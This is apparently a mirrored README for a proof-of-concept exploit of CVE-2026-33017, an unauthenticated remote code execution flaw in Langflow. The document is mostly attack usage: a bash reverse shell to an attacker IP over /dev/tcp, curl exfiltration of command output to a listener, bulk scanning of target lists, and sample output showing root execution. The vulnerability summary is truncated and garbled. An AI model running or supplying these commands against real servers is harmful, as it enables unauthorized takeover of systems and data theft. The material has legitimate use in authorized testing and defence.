Share
## https://sploitus.com/exploit?id=CFEED51B-A567-5A95-9094-445E7B4A5933
# CVE-2026-33017 โ Langflow Unauthenticated RCE PoC




> **For educational and authorized testing purposes only.**
## Summary
Langflow ` **Important:** The PoC uses `os.system()` at module level โ the command runs on the server but its output goes to the **server's stdout**, not back to the HTTP response. The PoC only confirms that execution occurred (`[+] VULNERABLE`). To actually receive command output, use one of the exfiltration methods below.
**Blind confirmation (verifies RCE without capturing output)**
```bash
python poc.py --url http://target:7860 --cmd "id"
```
**Reverse shell โ with local listener**
```bash
# 1. Start a listener on your machine
nc -lvnp 4444
# 2. Send the reverse shell
python poc.py --url http://target:7860 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'"
```
**OOB exfiltration via HTTP callback โ with local server**
```bash
# 1. Start a local HTTP server
python3 -m http.server 8080
# 2. Exfiltrate output via curl callback
python poc.py --url http://target:7860 --cmd "curl http://10.10.14.1:8080/\$(id | base64 -w0)"
```
**With a known public flow UUID (no flow creation needed)**
```bash
python poc.py --url http://target:7860 --cmd "id" --flow-id
```
**Bulk scan from file**
```bash
python poc.py --url-file targets.txt --cmd "id" --threads 10
```
### Example Output
The PoC confirms that execution occurred. `[+] VULNERABLE` means the build succeeded and the injected code ran โ it does **not** mean output was captured.
```
============================================================
CVE-2026-33017 โ Langflow RCE PoC
============================================================
Targets : 1
Command : curl http://10.10.14.1:8080/$(id | base64 -w0)
Threads : 5 | Timeout : 15s
============================================================
[http://target:7860] auth: JWT token obtained
[http://target:7860] flow: created (3f2a1b4c-...)
[http://target:7860] [+] VULNERABLE โ RCE executed
[http://target:7860] flow: deleted (3f2a1b4c-...)
============================================================
SUMMARY
============================================================
[+] http://target:7860 VULNERABLE
============================================================
1/1 target(s) vulnerable
```
Output received on the local HTTP server:
```
10.10.14.1 - - "GET /dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCk= HTTP/1.1" 200 -
# base64 -d โ uid=0(root) gid=0(root) groups=0(root)
```
## References
- [GHSA-vwmf-pq79-vjvx](https://github.com/advisories/GHSA-vwmf-pq79-vjvx)
- [CVE-2026-33017](https://vulners.com/cve/CVE-2026-33017)
- [Langflow repository](https://github.com/langflow-ai/langflow)
- Related: [CVE-2025-3248](https://github.com/advisories/GHSA-xm5v-h5f2-2mjp) โ similar `exec()` issue on `/api/v1/validate/code`